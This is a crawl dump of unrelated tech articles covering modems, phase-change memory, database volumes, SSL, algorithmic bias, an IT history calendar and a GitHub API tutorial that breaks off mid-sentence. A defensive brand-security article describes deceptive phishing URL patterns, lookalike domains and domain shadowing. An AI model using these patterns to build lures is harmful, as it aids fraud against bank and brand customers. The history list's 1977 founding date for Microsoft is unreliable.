modem, allowing many PCs to connect to the Internet simultaneously. - Cable modem If you wish to establish a high-speed cable Internet connection, you must have a cable modem, and cable TV providers typically offer this option. You may not always need a separate cable modem because some newer set-top boxes are equipped with cable modem functionality. In contrast to DSL, which uses the telephone network, cable Internet uses the cable TV network. - Dialup modem A dial-up modem is used to connect to the Internet from a computer or laptop using a telephone line. Although it is no longer widely utilized because of its relatively sluggish transmission speed (up to 56Kbps), it is nevertheless used in rural regions where there are no other options for a better Internet connection or as a backup link. Additionally, the majority of dial-up modems allow you to connect them to fax machines in order to send and receive faxes. The features of an internet modem An internet modem may send and receive data from your ISP, respectively. The modem’s transmission function converts data into phone line-compatible signals, and its receiving function demodulates received data back into digital data. The functions of an internet modem Below are a few of the key responsibilities of an internet modem: An internet modem’s sole primary duty is to send signals to other internet modems. Additionally, it decodes all signals, enabling the transmission of digital data between nodes. - Compression of data A data compression method is necessary for Internet modems. It enables reducing the time it takes to send and receive data and the percentage of errors that occur during signal transmission. The size of signals needed to transfer data is also reduced because of data compression. - Flow control Each internet modem sends signals at a different rate. This may cause problems when internet modems send and receive signals. In the flow control strategy, the faster internet modem would pause if the slower one sent signals to the faster one. This enables slower internet modems to catch up to quicker ones so that data transmission can continue. What are the uses of an internet modem? - Customers may use credit cards or debit cards to make purchases, but they may not be aware that modems also play a significant part in transferring data and receiving confirmation of that data. They are utilized in ATMs, ticketing devices for airports, railways, and other locations, as well as for hotel or mall payments. - To save travel expenses and save time and money, modems are also used in remote locations. For instance, gas stations, call centers for coolers, inventory management for vending machines, and timing management for stoplights. - Internet modems are also used for automatic communication between two pieces of equipment, such as when medical gadgets transmit test results from patients to the computers of their doctors. In a nutshell, internet modems are used to transfer data between different devices. It performs the function of a decoder to convert signals for digital devices before encoding data for transmission to other internet modems. We hope this article succeeded in providing all the information that you needed about modems and internet modems in particular.
<urn:uuid:bbb55426-539a-4585-847c-ac611d22279c>
CC-MAIN-2022-40
https://latesthackingnews.com/2022/09/07/how-does-an-internet-modem-work/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00652.warc.gz
en
0.934063
1,113
2.953125
3
A new chip technology could encroach on flash memory and hard-disk drive market share, as a group of companies led by IBM explore phase-change memory. Big Blue,Macronix andQimonda on Monday announced joint research results that give a major boost to this new type of computer memory, which they are touting as the successor to flash memory chips. Flash memory is widely used in computers and consumer electronics, including digital cameras and portable music players. Scientists designed, built and demonstrated a prototype phase-change memory device that switched more than 500 times faster than flash while using less than one-half the power to write data into a cell. The device’s cross-section is a minuscule 3 by 20 nanometers in size, which is far smaller than flash and is equivalent to the industry’s chipmaking capabilities targeted for 2015. “These results dramatically demonstrate that phase-change memory has a very bright future,” said Dr. T. C. Chen, vice president, science and technology at IBM Research. “Many expect flash memory to encounter significant scaling limitations in the near future. Today, we unveil a new phase-change memory material that has high performance even in an extremely small volume. This should ultimately lead to phase-change memories that will be very attractive for many applications.” Changing the Tide Phase-change memory appears to be much faster and can be scaled to dimensions smaller than flash memory — enabling future generations of high-density nonvolatile memory devices as well as more powerful electronics, according to the companies. Nonvolatile memories do not require electrical power to retain their information. By combining nonvolatility with good performance andreliability, phase-change technology may also enable a path toward a universal memory for mobile applications, the companies said. On the Drawing Board Unlike flash, phase-change memory technology can improve as it gets smaller with Moore’s Law advancements. Phase-change memory, as well as some other nonvolatile memory technologies, have been on the drawing board for some time, according to Rob Lineback, a senior market research analyst at IC Insights. “As you start to shrink some of the parts of the cell of flash memory, it can no longer hold the charge, at least over a 10-year period, and there is always a desire to have something that writes and reads data faster. That’s why these technologies are being pursued,” Lineback told TechNewsWorld. New Material Makes It Possible A new alloy material makes phase-change technology possible. The fastest and most economical memory designs — SRAM and DRAM, respectively — use inherently leaky memory cells that must be powered continuously. These “volatile” memories lose their stored information whenever their power supply is interrupted. The pressure is on to discover a nonvolatile memory because most semiconductor makers agree that flash will eventually become less viable.Intel is also working on nonvolatile memory, among others. “It seems like every time that people think flash is going to run out of steam, companies find a way to extend flash,” Lineback said. “This is a promising development, but it will be a couple of generations — three to six years — before we see if it’s going to be any major force in the marketplace.”
<urn:uuid:39278241-060c-4c21-a76b-1612bea7b5ae>
CC-MAIN-2022-40
https://www.linuxinsider.com/story/ibm-boosts-development-of-flash-memory-successor-54665.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00652.warc.gz
en
0.93789
692
2.625
3
Data volumes contain the database data. For more information on volumes, refer to the Volumes Overview section. Assigning Nodes to a Volume When creating a storage volume, you set the number of master nodes the volume will use and assign the master nodes to the volume. Master nodes are the active nodes in a cluster. For example: in a cluster that will have 4 active nodes and 1 reserve node (a '4+1' setup), the number of master nodes is 4. The following principles apply: - The value you set in the Number of Master Nodes field of the Add EXAStorage Volume screen must match the number of nodes you add to the volume's Nodes List. - The number of master nodes that you define for the volume must match the number of active nodes you assign to the database later when you Create a Database. Follow these steps to create a data volume: - In EXAoperation, go to Services > EXAStorage and click Add Volume. - Enter the properties for the new node, and set the Volume Type to Data. - Click Add to create the volume. The volume is added to EXAStorage. |Redundancy||The number of copies there are of a data segment. For example, a redundancy of '2' means that there will be two instances of a specific segment of data, stored on separate nodes in the cluster.| |Label||A descriptive name for the volume.| |Allowed Users||The users who are permitted to access the volume. These users are able to perform tasks such as backup scheduling, creating databases, etc.| Users who should have read-only access. Any users that you add as Read-only Users are limited to read-only access, even if they are added to the Allowed Users list. |Priority||The priority of the volume in terms of process scheduling priority. A higher number specifies a higher priority. You can use this setting if you have two volumes (and thus two databases) running on the same disks to give one of the databases priority for processing requests. For most cases, you can set the priority to a value of '10' for all volumes.| |Volume Type||Specifies if the volume is a data volume or an archive volume.| |Volume Size (GiB)||The maximum size of the data volume in GiB.| |Nodes List||The nodes that the volume will use.| |Number of Master Nodes|| The number of active nodes in the cluster. The number you enter in this field must match the number of nodes added in the Nodes List. The number of master nodes that you define for the volume must match the number of active nodes you assign to the database later when you create the Exasol database instance. |Block Size (KiB)||Size of the data blocks for the database in KiB.| |Disk||The storage disk that the volume will be stored on.|
<urn:uuid:6bd24671-878d-4ff7-bd6a-ea19989861bc>
CC-MAIN-2022-40
https://docs.exasol.com/db/7.0/administration/azure/manage_storage/create_data_volume.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00652.warc.gz
en
0.811872
640
3.21875
3
For years, stepping on a flight meant a guaranteed loss of internet connectivity. Insufficient bandwidth, lagging video streaming, and webpage timeouts made in-flight surfing or downloading a frustrating event. However, air-to-ground tracking has revolutionized the availability of internet connectivity while in-flight. Air-to-ground tracking works by establishing a series of ground stations along a designated path. Beam-forming antennas are placed at the sites to connect with properly outfitted planes flying overhead. Once a plane follows the path of these established ground stations, the air-to-ground tracking technology allows passengers to enjoy the high-bandwidth, low latency connectivity previously only available to them in their homes. In-flight, air-to-ground tracking can provide passengers with connectivity speeds of up to 100Mbit/sec while the plane reaches altitudes of up to 45,000 feet. Air-to-ground tracking also helps planes maintain a consistent in-flight broadband experience. The longer that the aircraft follows the established terrestrial stations, the longer passengers can enjoy the high-bandwidth speeds previously unrealized on commercial airplanes. In addition to increasing passenger and crew comfort on commercial flights, air-to-ground tracking can be used to download flight and plane data on the ground to study safety and preventative maintenance. By sharing this data in-flight as opposed to between flights, operators have a better chance of catching mechanical failures or wearable parts quicker, saving passengers and crew from potential danger.
<urn:uuid:55d0963a-7325-4dfa-a9f4-b25bbdcd9339>
CC-MAIN-2022-40
https://www.extendingbroadband.com/aerial-tracking/air-ground-tracking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00652.warc.gz
en
0.928782
306
3.171875
3
A web domain name is the foundational piece of internet property allowing its owner (registrant) to construct and host an associated website. On a domain, the owner is also able to construct whatever subdomains they wish—a process that is technically achieved via the configuration of records on the authoritative domain name system (DNS) server. A subdomain name is the part of the URL before the domain name, and separated by a dot (e.g., “blog” in the URL https://blog.cscglobal.com/). Subdomains can be used in the construction of web addresses for a number of different purposes, such as the creation of individual microsites for sub-brands or campaigns, or the production of region- or subject-specific subsites. Some internet service providers (ISPs), known as private subdomain registries, also offer the sale of specific commoditized subdomains of their site, allowing users to create their own sites (e.g., “second-level” domains such as blogspot.com, which allows users to register URLs in the form of username.blogspot.com, for the creation of a personalized blog in this case). Subdomain name abuse in general internet content From a brand monitoring point of view, the appearance of a brand name or other relevant keyword(s) in the subdomain name of a third-party URL can be associated with a variety of brand infringement types. Some areas of potential concern include: - As a means of driving traffic to third-party content via misdirected search-engine queries - Creating sites featuring claims of affiliation with the brand in question - Reputation issues—e.g., creating sites containing information, customer comments, or activism-related material pertaining to a particular brand - As a means of creating a URL appearing deceptively similar to that of an official brand site (e.g., for fraudulent activity, phishing, or the distribution of malware) Brand-specific subdomains can be a source of confusion for internet users—and thus an effective threat vector—because of their similarity to familiar, legitimate URLs. For example, the hypothetical and unofficial domain cscglobal.blog.com could be used to create a convincing fake version of the official blog.cscglobal.com. In recent months, a number of (often SMS-based) phishing attacks have been observed to make use of a brand name in the subdomain name to create a highly convincing, deceptive URL in a particular way,, as shown in the example in Figure 1. Figure 1: Example of a 2021 SMS-based phishing attack targeting HSBC customers In this example targeting U.K. customers of the bank, the phishing URL makes use of a reference to HSBC in the subdomain name, together with a domain name beginning with “uk-” (uk-account.help), as a means of producing a URL that appears visually very similar to the real “hsbc.co.uk/account-help.” The phishing site link also uses the HTTPS protocol, historically an indicator of trust, but now a characteristic shared by over 80% of phishing sites in response to the easy availability of secure sockets layer (SSL) certificates from free providers. This approach is particularly effective for a number of reasons, including the fact that it uses a new generic top-level domain (gTLD)extension that may be unfamiliar to some users, and the tendency for the displays in mobile devices to insert line breaks after hyphens. Zone file analysis shows there are at least several hundred registered new gTLD domains with names of a similar format that have the potential to be used fraudulently. Identified examples include uk-authorization-online.support, uk-gov.tax, uk-insurance.claims, uk-border.agency, and uk-lottery.win. Other recent identified examples of branded subdomains in phishing scams include hermes.online-parcel-reschedule.com (for logistics company Hermes); and o2.billing9k7j.com (for telecommunications organization O2). This type of attack circumvents the requirement for the fraudster to register a brand-specific domain name (which is potentially easier to detect by a brand owner employing a basic domain monitoring service). In many cases, the WHOIS records for the parent domains are anonymized, making it difficult to establish links between cases. These domains are also often registered immediately prior to the attack and are used for a short period in an effort to circumvent detection and takedown efforts. In general, brand-related subdomains on third-party sites are more difficult to detect than domain names themselves, which can much more easily be identified through wildcard searches of registry zone files. The most straightforward method for identifying subdomains is through search engine metasearching, providing the subdomains in question are linked from other sites and have been indexed by the search engines. Beyond this, the issue can partially be addressed through the use of other techniques, such as a detailed analysis of domain name zone configuration information (e.g., passive DNS analysis), certificate transparency (CT) analysis, or via the use of explicit queries on particular domains for the existence of specific subdomain names. Other issues include private subdomain registries being problematic because they’re not necessarily regulated by the Internet Corporation of Assigned Names and Numbers (ICANN), and thus may lack dispute resolution procedures, abuse reporting processes, or records of any sort of WHOIS information. When considering enforcement against infringing subdomains, options can be relatively limited—particularly in comparison with the range of approaches available for domain names. It’s sometimes possible to achieve engagement with the registry, registrar, hosting provider or DNS provider, but they may not be obligated to comply. Furthermore, many established dispute processes, such as the Uniform Domain-Name Dispute-Resolution Policy (UDRP), don’t necessarily apply to subdomains. However, exceptions do exist in some cases, such as certain new gTLDs, instances where the host domain name corresponds to a country code (e.g., jp.com), or other limited circumstances (e.g., those covered by the Dispute Resolution Service (DRS) for .NZ). Failing this, court litigation is often a last resort. Finally, the use of fraudulent domains in conjunction with wildcard MX records (which allow the domain owner to receive emails sent to any subdomain on the domain name) can also be a highly efficient way for criminals to intercept mail intended for trusted organizations, and thereby harvest sensitive information. This can be successful in cases where the recipient email address has been mistyped (i.e., with an extra “.” inserted). If the domain name is carefully selected, it can enable attacks against a range of different organizations (e.g., *.bank.[TLD] can be used to harvest mis-addressed emails intended for any organization with an official domain name of the form [brand]bank.[TLD]). Subdomains of official domains within the brand owner’s own portfolio Considering the domain security landscape, an area of primary concern for a brand owner is the existence of subdomains on domains under their own ownership. Brand owners may use subdomains of official sites for a number of different purposes, as discussed previously. However, when they register a lot of subdomains—IBM® has around 60,000 and Microsoft® over 120,000—subdomain management can become a significant endeavor. The associated risks make it possible for bad actors to take over the subdomains through exploitation of expired hosting services (an issue known as “dangling DNS records”), DNS misconfigurations, or untrustworthy legitimate users. Compromise can also be achieved using pharming (DNS poisoning) attacks, where subdomain records are modified to re-direct traffic to a fraudulent IP address. This can give fraudsters the ability to create fake sites, upload content, monitor traffic, or hack official corporate systems. A 2021 study identified over 1,500 vulnerable subdomains across 50,000 of the world’s most important websites. A number of news stories have emerged in recent years of corporations being attacked in this way, including instances of official corporate subdomains being hijacked to re-direct to content including malware, pornography, and gambling-related material. Subdomains of the Xerox website, for example, were used in 2020 to drive traffic to sites selling fake goods, taking advantage of the trusted reputation of the official corporate domain to boost the search-engine ranking of the malicious content. In another case in 2019, GoDaddy® shut down 15,000 abused subdomains that drove a massive spam campaign geared towards the sale of counterfeits. Brand owners can mediate these threats by analyzing their own domain portfolio and being mindful of any subdomains pointing to external IP addresses. Another risk is the possibility for criminals to create new, unofficial subdomains of official sites via DNS compromise through a method such as phishing or dictionary attacks—a practice known as “domain shadowing.” This approach can also be used to drive users to threatening content, while taking advantage of the protections associated with being hosted on a trusted website (e.g., to circumvent site block listing). In one reported example of this practice, a number of domains (primarily registered through GoDaddy) were compromised to create over 40,000 subdomains pointing to Russian IP addresses hosting a range of malware variants,. This type of attack can be difficult to detect, both because it avoids the requirement to make changes on the official corporate webserver, and because the infringing content is typically hosted externally. The damage may only become apparent following complaints by users, or in response to the official domain being added to a block list due to the malicious activity. Rigorous security measures are the primary preventative approach, including the use of strong passwords and two-factor authentication. A related attack vector is the use of wildcard DNS records, which can result in any arbitrary subdomain name being set to re-direct to a malicious external IP address. Bad actors can use randomized, changing subdomains to circumvent hostname-based block listing (e.g., in coordinated phishing campaigns). This type of attack can be applied both to official (compromised) or third-party (stand alone) domains. Overall, to mitigate these threats, brand owners should employ a robust domain security posture combined with a comprehensive program of brand monitoring and enforcement. We’re ready to talk If you’d like to talk to one of our specialists about domain monitoring and enforcement, or anti-fraud services, please complete our contact form.
<urn:uuid:83fea00a-9fe7-4213-a80c-0ddefae6f2b0>
CC-MAIN-2022-40
https://www.cscdbs.com/blog/the-world-of-the-subdomain/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00652.warc.gz
en
0.90891
2,269
3.34375
3
From a national security standpoint, encryption technologies stand to improve our ability to protect valuable personal information. However, leadership at the FBI apparently aims to dissuade people from using unbreakable encryption services that could protect their websites and computers. This measure could drastically reduce the security that assures people of the privacy that is necessary to maintain their personal and professional lives. Jim Comey, the director of the FBI spoke in front of the Appropriations Committee at the House of Representatives to urge Congress to pass legislation that would require tech companies to create backdoor access to any and all phones, computers and mobile devices that could otherwise be protected by encryption protections. "One of the things that the administration is working on right now is what would a legislative response look like that would allow us … with court process to get access to that evidence", Comey said. Apple's decision to mandate encryption to all iPhones was a sea change in how tech companies protect their customer's private data. That decision irked many members of government and national security services as mobile data access can improve the scope of surveillance programs administered by the National Security Agency and other government organizations. Web hosting services that offer encryption protections will be imperative as currency becomes increasingly digitized. Smartphones may soon replace credit cards, so having financial data be secure will be essential to the success of that transition. MC Services provides web hosting through secure, encrypted domains that can allow a company to keep its important data secure. In doing so, ecommerce transactions can be performed with confidence. IT consultants can improve cyber security by implementing web programming that treats privacy with paramount importance.
<urn:uuid:d3ec1896-2f7e-4466-a6a4-cc492e72e0e4>
CC-MAIN-2022-40
https://www.mcservices.com/post/fbi-changes-stance-on-encryption
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00652.warc.gz
en
0.954205
319
2.515625
3
SSL certificates are small files filled with a cryptographic key and are bound to the details of a larger organization. It is installed on a web server which in turn activates a padlock so then people are able to open secure connections from web servers to different browsers. SSL certificates are typically used to create security for credit card transactions, allow data to be transferred securely, and logins to be more secure than usual, especially on social media sites. Additionally, SSL certificated bind information together such as domain names, server names, and hostnames to a company name, also known as the organizational identity. In order for a business’s web server and browsers to be totally secure, it must first install an SSL certificate. Once installed, the certificate will establish a secure connection so that all the web traffic of visiting people. This way the web server and web browser are completely secure. You will know that the installation was successful when the beginning of your website name “HTTP” chances to “HTTPS”, with the S standing for Secure. How Do SSL Certificates Work? SSL Certificates are installed through the use of something known as public key cryptography. Public key cryptography uses a long string of random numbers. One of the key numbers is known as the private key and the other is known as the public key. The public key can be seen on your server and your public domain so everyone can see it. In essence, this means that people will be able to send messages or complete payments over the computer and hackers can intercept the message but will be unable to hack it. All they will be able to see is a cryptographic code which will be completely unbreakable. Why should businesses look into getting an SSL Certificate Every established business that has any sensitive information, take information from their clients, or who accepts payments should definitely consider getting an SSL Certificate. Below are all of the reasons why a business should consider getting an SSL Certificate and all of the work that it can do for your business in return: - Protects your sensitive information and client sensitive information - Keeps server data secure - Boosts Google rankings - Creates more trust between business and customer - gives a business better conversion Where can a business buy an SSL Certificate SSL Certificates can be bought from a well-known Certificate Authority. There is a long list of very trusted CA root certificates where you can get one. In order to know whether certificate authority is trustworthy or not, you must look for a root certificate on the user’s machine. If it has this, then you can proceed if it does not then your browser will automatically show an untrusted error message. Knowing this will help gain confidence in the website and in your organization and keep major consumers from losing confidence in your business.
<urn:uuid:949206cb-7f8a-4018-9dce-08b7db3424fd>
CC-MAIN-2022-40
https://mytekrescue.com/what-is-an-ssl-certificate/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00052.warc.gz
en
0.93993
570
3.046875
3
Machine learning and artificial intelligence are increasingly part of daily life. This emerging technology can improve processes and make them more accurate. That said, it can also exacerbate existing inequities by embedding unconscious biases of human designers and using data generated in inequitable systems. Machine learning is the process by which information is introduced to a computer to identify patterns using algorithms. The patterns recognised are called models, which describe the information methodically, allowing predictions about the world beyond initial data. In circumstances where the product is artificial intelligence, the computer can continuously learn as it performs tasks based on initial models. For example, if the objective is to learn about people’s purchasing preferences, providing data on purchase histories to the computer can allow it to identify patterns in similar purchases via grouping algorithms. It can create models of preferences and ultimately recommend similar items to individuals when they search for merchandise next time. Even in this oversimplification, two sources of algorithmic bias emerge: the original data and the algorithm, both created by humans. So what impacts how fair or biased the technology is? 3 considerations to limit algorithmic bias in health technologies 1. Limitations of the evidence base The first phase of limiting bias in the technology is understanding the context in which you operate. Often algorithms include assumptions derived from research and literature. There is an inherent assumption that science is definitive, objective, and unbiased, however, science is a process. Building solid foundations of evidence and building its evidence base requires multiple studies on various groups representative of the population by different researchers, showing similar results over time. Unfortunately, diversity, equity and fairness have historically not been prioritised, and a limited evidence base is truly generalisable to everyone. That is why it is crucial to critically evaluate the existing literature for comprehensiveness, fairness and applicability before applying any assumptions. For example, pharmaceutical clinical trials have mainly recruited adult white males; however, the results are generalised to the entire population. Algorithms built upon these results often do not accurately represent all underrepresented groups and can lead to unintentionally biased technologies. 2. Limitations of the data sets and algorithms In the second phase, limitations of 1) the data from which the computer will learn and 2) the algorithms being used should be considered. While these seem detailed questions meant for data scientists, the decision’s impact on the result is immense; therefore, business segments need to at least be aware of the methods and able to communicate the results with limitations in mind. For example, credit scores are determined through models that attempt to capture financially risky behaviours and poor habits. However, marginalised groups have historically been offered predatory products that lead to the snowballing of debt, which is then reflected in the data. This example is one of many that amplify systemic bias in the data via models and continues to disadvantage one population while advantaging another, especially through a scoring system that is used so frequently and ubiquitously. Understanding the context and limitations and tempering the interpretation of the results is an important step that should involve the business unit and company leaders. 3. Impacts of new technology on marginalised communities The negative impact of tech and algorithmic biases may not be intentional; however, the solution to health inequities should be. Therefore, in the third phase, development and business segments must be diverse, and multidisciplinary and include subject matter experts and community stakeholders to contextualise the results and think critically about possible outcomes. Additionally, it is crucial to assess the post-market, real-world evidence after the technologies have been used for some time and are transparent and accountable for those outcomes. For example, there are race-based algorithms for medical decision-making. Ideally, the algorithms lessen disparities, although historically, this has not been the case. For instance, there are models which estimate the kidney’s filtration rate to determine if patients require specialised treatment or qualify for transplants. Previously, the model would predict higher filtration rates for Black patients (i.e. they would appear less ill). Unfortunately, the resulting policies led to an increased rate of disease progression and delayed referrals for transplantation for Black individuals. One study estimates that if the models were still used, approximately 68,000 Black adults would not be referred to specialist care (population estimates were calculated based on the Diao et al publication and the American Community Survey ACSDT5Y2020 dataset). At the same time, an additional 16,000 would be ineligible for the transplant waiting list. This outcome is particularly undesirable considering the incidence of End-Stage Kidney Disease is three times higher in Black individuals compared to white. Steps could have been taken earlier to prevent inequitable care from worsening after these clinical practices were implemented but that’s not the overarching theme. The point is that the algorithm’s application and potential impact were neither considered thoroughly nor contextualised within the epidemiology and inequity of kidney failure. Beyond algorithmic biases As data science becomes a prevalent tool, organisations should ensure that those technologies don’t simply automate existing algorithm biases. By working through these three key considerations, having multidisciplinary teams and staying accountable after the technology is in use, organisations can help mitigate algorithmic bias, prevent exacerbation of existing inequities and help create a more equitable environment. Most importantly, the ubiquity of data science across all industries is here to stay. Therefore, to maximise its use for transformative outcomes and avoid beginner missteps, all companies should invest in better understanding of data science at every level. Follow us and Comment on Twitter @TheEE_io
<urn:uuid:89a9d4e0-79d3-4f6a-977a-256534bfae5d>
CC-MAIN-2022-40
https://www.theee.ai/2022/09/13/20222-three-considerations-when-erasing-bias-in-emerging-tech/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00052.warc.gz
en
0.938722
1,139
3.625
4
1 ICANN, the Internet Corporation for Assigned Numbers and Names, assumes responsibility for coordinating the domain naming system in 1998. ICANN registers top-level domains such as .com, .org, .net and varieties of other dots. 2 The Electronic Numerical Integrator and Computer (ENIAC), one of the first digital computers, shuts down in 1955. Commissioned in 1943 by the Army’s Ballistics Research Laboratory to produce firing and bombing tables during World War II, ENIAC was finally ready for operation in 1946?months after the war ended. 4 The Soviets launch the satellite Sputnik from Kazakhstan in 1957, making it the first man-made object to enter space. Sputnik orbited 500 miles above the earth for about three months and initiated the space race. 6 Seymour Cray, who introduced the first supercomputer in 1976, dies in a car accident in 1996. The Cray 1 could calculate 240 million arithmetic operations per second. 9 Alexander Graham Bell, in 1876, conducted the first telephone conversation over outdoor telegraph lines. Bell, in Boston, was talking to his assistant Thomas Watson, who was two miles away in Cambridge, Mass. 13 Spreadsheet Lotus 1-2-3 is unveiled in 1982 and quickly becomes the leading spreadsheet. Roughly 1-2-3 years later, in 1985, Microsoft introduced its rival Excel spreadsheet. 15 The first radio paging service starts in 1950. Twenty-five miles outside New York City, a doctor on a golf course receives the first page via a six-ounce receiver in his pocket, thus paving the way for beepers of the future. 18 Thomas Edison dies in 1931 at the age of 84 in West Orange, N.J. Edison invented the electric lightbulb, universal stock ticker, phonograph, electrical vote recorder, automatic telegraph system, electric safety miner’s lamp, motion picture camera, nickel-iron-alkaline storage battery and the carbon telephone transmitter. 19 In 1998, the Justice Department’s antitrust trial against Microsoft begins. The government accuses Microsoft of pressuring PC makers to use its Explorer browser instead of Netscape’s Navigator. 20 The first fully automated post office system is put into use in Providence, R.I., in 1960. The experimental project cost $20 million and sorted mail at a rate of 18,000 pieces per hour. 22 Chester Floyd Carlson makes the first Xerox copy in Queens, N.Y., in 1938 by pressing wax paper against an electrostatically charged plate covered in dark powder. The copy read “10-22-38, Astoria.” In 1947, Carlson licensed his process to the Haloid Co., which later became Xerox. 28 William Henry Gates III is born in 1955 in Seattle. Gates became the wealthiest American by age 35. Gates dropped out of Harvard University in 1975 to market the Basic computer language compiler with childhood friend Paul Allen. They founded Microsoft in 1977. By 1981, IBM was running Microsoft DOS on the IBM PC. The rest, as they say, is history. Sources: HistoryChannel.com, Internet Archive, Tesla Memorial Society of New York, The Antique Advertiser, Free Online Dictionary of Computing (FOLDOC), History of Computing Foundation, Edison Birthplace Association, O’Melveny & Myers, Bato Balani Interactive
<urn:uuid:9483d849-d281-4379-8ba0-449d12e4460a>
CC-MAIN-2022-40
https://www.cio.com/article/270344/internet-this-date-in-it-history-oct.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00052.warc.gz
en
0.895864
696
3.15625
3
If you’re using GitHub, it’s crucial that you understand how GitHub APIs work. These APIs can be used for basic and advanced development on GitHub. This in-depth guide will teach everything you need to know about GitHub APIs and how to use them, including real examples you can model. What is GitHub API Anyway? Before we dive into the specifics of GitHub APIs, I want to make sure you have a firm grasp of APIs as a whole. API is an acronym that stands for “Application Program Interfaces.” Developers rely on APIs to access various web tools and information in the cloud. In simple terms, an API makes it possible for applications on different platforms to communicate with each other. Whenever someone uses an application on their phone or computer, the app connects to the internet and communicates with a server. After retrieving and interpreting that data, the server sends it back to the user’s device in a readable format. All of this happens through an API. Here’s one of my favorite analogies to explain how an API works: Let’s say you’re going out to dinner. You’re seated at a table with a menu full of options to choose from. The kitchen will ultimately prepare your meal, but someone needs to tell them what you want. The waiter takes your order and tells the kitchen what to do. Finally, the waiter brings your food to the table from the kitchen. In this scenario, the waiter is the API. It’s their job to communicate between two different “platforms” and deliver a response from one to the other in a “readable” format (in this case, an edible format). Let’s apply this same concept to a real-life example of an API. I’m sure you’ve used the internet or an app to book a flight online. If you go directly to an airline’s website, like Delta or Southwest, you’ll input the dates, choose your destination, view the flight times, compare the costs, and select your seat. Behind the scenes, the website is interacting with the airline’s database for flight availability. Now let’s say you don’t use an airline’s website. Instead, you use a third-party travel site, like Booking.com or Expedia. How does this third-party site aggregate the flight information from different airline databases? This is possible with an API. Expedia’s application uses APIs to connect with Delta, Southwest, United, American Airlines, and other options for your request. The API takes the information you’re asking for, requests it from the different servers, and sends back a readable format that you can use to compare flight options. How GitHub API Works GitHub APIs make it possible for developers to interact with GitHub. You can use these APIs to create and manage new repositories, issues, pull requests, branches, and so much more. For example, you can use a GitHub API to fetch information available to the public through a public repository on GitHub. There are two different versions of the GitHub API. There’s a REST API and a GraphQL API. The REST API, also known as GitHub RESTful API, is an application program interface that adheres to the REST architecture style, allowing interaction with various RESTful web services. REST stands for “representational state transfer.” GitHub REST APIs typically use HTTP requests to handle the following: - GET — Retrieve a resource - PUT or PATCH — Update a resource - POST — Create a resource - DELETE — Remove a resource The GraphQL API offers a bit more flexibility for GitHub developers. It allows you to define exactly what data you want and only the data you want. Rather than using multiple REST requests, the GraphQL API makes it possible to fetch data with a single call. Here’s a brief overview of the GraphQL data query language: - Spec — A specification that validates the schema on the API server. That schema ultimately determines if the client calls are valid. - Strongly Typed — Defines the type system of the API and its object relationships. - Introspective — The client can query the schema for its details. - Hierarchical — GraphQL calls have a shape that mirrors the JSON data that gets returned. Using nested fields, you can query for and retrieve data in the same round trip. GraphQL is not technically a storage model or query language for databases in terms of the application layer. It refers to the graph structure defined by the schema. Nodes define the objects, and edges define the relationships between objects. The GraphQL API returns data to the application based on those schema definitions, regardless of how the data gets stored. Here’s the base URL for the GitHub API: https://api.github.com/ Now let’s take a look at some different examples of the GitHub API: Example #1: Access Publicly Available Information Arguably the most common use case for GitHub APIs is accessing public information. To get public information with the GitHub API, you do not need an authentication token. Some examples of public information you can retrieve with a GitHub API include: - User information from a username - Information about a user’s follower list - See if one user follows another In these examples, you’d be able to see a JSON response with basic information like a user’s name, email address, and image URL. Example #2: Run Tasks as an Authenticated User If you have an authentication token, you don’t need to provide your username in the endpoints, like you would for public information. By using a token instead, you’ll have the ability to do things like: - Create a repository - List issues assigned to your account - Create a new issue - Comment on an existing issue - Open or close an issue I’ll explain how to create an authentication token in greater detail shortly. We’ll also cover more examples of what you can do once you authenticate the API with a token. How to Get Started With GitHub API Now that you understand what the GitHub API is and how it works, let’s focus on getting you started with your first GitHub API. The following steps will walk you through the concepts associated with using GitHub APIs and building momentum. By following this tutorial, you can apply the same steps and concepts to your specific use cases. Step 1: Test Your Setup and Get Organized The first thing you need to do is verify that you’re ready to start using GitHub APIs. So you can start by opening a new command prompt and entering something basic. In this example tutorial, you can start with this: https://api.github.com/zen You should see a random design philosophy from GitHub. I did this a few times and saw responses like: - Design for failure. - Mind your words; they are important. - Avoid administrative distraction. As long as you get a similar response here, you’re on the right track so far. Now let’s take this test one step further, and get some information from a public user profile. For this test, we’ll look at Chris Wanstrath—the co-founder of GitHub. We can use this API in the command line: https://api.github.com/user Then we just need to add #GET and Wanstrath’s username, defunkt, which will look like this: Then you can add -i after the $ curl to include headers. The response should look something like this: You’ve now used a GitHub API for two different test purposes. First, you retrieved a random design philosophy quote. Then you used the user API to get information about a specific user profile. Step 2: Create Personal Access Tokens and Authenticate If you want to get the most out of the GitHub API, you’ll need authentication. If you’re unauthenticated, you can only make 60 requests per hour, which isn’t really enough if you want to do anything practical or interesting. The simplest way to authenticate with the GitHub API is through personal access tokens. You can do this by leveraging Basic Authentication via OAuth since OAuth tokens also include personal access tokens. To create a new personal access token, navigate to your GitHub account’s personal access token settings. GitHub recommends that you set an expiration for the token as a way to keep your personal information safe and secure. API requests with a personal access token will have a header for GitHub-Authentication-Expiration. Using this in your scripts can help warn you when a token is close to expiring. Tokens can be used in place of a password for Git over HTTPS. They also work to authenticate the API. It’s really important that you take your time when choosing the permissions and scope of the token. You should also treat your tokens like passwords. They should be kept in a secure environment when you’re not using them. If a token falls into the wrong hands, it could be destructive for your account. Once you’ve created the personal access token, you should see the request limit jump to 5,000 requests per hour. This increase will make it easier for you to read, write, and 